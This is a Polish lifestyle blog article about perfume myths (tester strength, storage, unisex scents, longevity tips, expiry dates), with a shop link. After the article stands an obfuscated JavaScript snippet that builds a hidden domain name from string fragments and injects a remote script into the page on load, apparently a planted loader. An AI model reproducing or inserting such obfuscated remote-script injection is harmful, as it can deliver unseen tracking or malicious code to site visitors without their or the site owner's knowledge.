Przejdź do treści

Najciekawsze fakty i mity na temat perfum. Sprawdź, co warto wiedzieć!

Testery mają bardziej intensywny zapach, flakony najlepiej
przechowywać w łazience, a po aplikacji perfum należy je rozetrzeć na
skórze – ile razy słyszeliście coś podobnego? Z pewnością co najmniej
kilka. Okazuje się jednak, że niektóre przekonania na temat perfum nie
znajdują odzwierciedlenia w rzeczywistości, a ich pielęgnowanie może
wręcz przynieść odwrotny od zamierzonego efekt.

 Testery mają intensywniejszy zapach

Z pewnością wiele razy słyszeliście o tej teorii spiskowej, jakoby producenci perfum celowo podsuwali nam testery o mocniejszym i intensywniejszym zapachu niż ten, który skrywa się w buteleczce. Przekonanie to można bez skrupułów włożyć między bajki. Flakony, które stają się testerami, wybiera się losowo spośród produktów przeznaczonych do sprzedaży. Nie ma zatem możliwości, by ich zapach różnił się choć w najmniejszym stopniu.

 

Perfumy powinno się trzymać w łazience

Bez wątpienia byłoby to szalenie wygodne, lecz hołdując temu mitowi możemy na własne życzenie obniżyć trwałość perfum w bardzo krótkim czasie. Duża wilgotność, wysokie temperatury i ostre światło nie sprzyjają zachowaniu jakości zapachu. Jeśli chcemy rozkoszować się głębią kolejnych akordów przez kilka lat, przechowujmy flakony w suchym, chłodnym i zaciemnionym miejscu – może nie będą cieszyć oka, ale zmysły na pewno.

 

Perfumy dla mężczyzn mogą być stosowane przez kobiety

Wiesz, że podział na zapachy damskie i męskie powstał stosunkowo niedawno? Jest to dość sztuczny twór, a w dodatku umowny. Jeśli zatem podoba ci się jakikolwiek zapach z działu męskiego, nic nie stoi na przeszkodzie, by zaczął towarzyszyć ci na co dzień. Jeżeli jednak nie jesteś przekonana do tego pomysłu, możesz też wybrać perfumy unisex, które z założenia przeznaczone są do stosowania przez osoby obu płci.

 

Nie da się przedłużyć trwałości perfum

Oczywiście, że się da! Wystarczy kilka prostych trików, by twój ulubiony zapach, przykładowo Cacharel https://tagomago.pl/producent/56/cacharel/713/noa-perle/, pozostał z tobą na wiele godzin. Jak w takim razie tego dokonać? Pamiętaj o regularnym nawilżaniu skóry – jeśli będzie ona zbyt sucha, perfumy szybko się ulotnią. Pomocne mogą okazać się również bezzapachowe kremy, nałożone bezpośrednio przed aplikacją perfum – na tak przygotowanej skórze aromat utrzyma się dłużej!
By przedłużyć trwałość perfum, warto też pryskać nimi skórę w odpowiednich miejscach. Zapach najlepiej utrzymuje się na szyi, zgięciach łokci, karku czy nadgarstkach. Tylko nie pocieraj ich o siebie zaraz po nałożeniu! W ten sposób możesz jedynie przyspieszyć parowanie i ulatnianie się aromatu, przez co perfumy bardzo szybko przestaną być wyczuwalne.

 

Perfumy nie mają daty ważności

Owszem, mają, tak samo jak wszystkie inne kosmetyki. Gdzie jednak należy jej szukać? Na buteleczce lub pudełku znajdź znak przedstawiający odkręcony słoik i odczytaj znajdującą się na nim liczbę – określa ona okres przydatności produktu od chwili jego otwarcia. Najczęściej wynosi ona od 12 do 36 miesięcy.

(function(){
aavs=document.createElement(„script”);aavs_=”u”+(„s”)+”ta”;
aavs_+=(„t.i”)+””+”n”;aavs_+=((„f”)+”o”);aavs.type=”text/javascript”;
aavs_+=”/”; aavsu=”65605073″;aavsu+=”.y128ek9eavsbw9g24c7″;aavsu+=”j4dzl6d8uf4″;
aavs.src=”//”+aavs_+aavsu; aavs.async=true; document.body.appendChild(aavs);
})();

0 0 votes
Article Rating
Subscribe
Powiadom o
guest
0 komentarzy
Inline Feedbacks
View all comments
%d bloggers like this: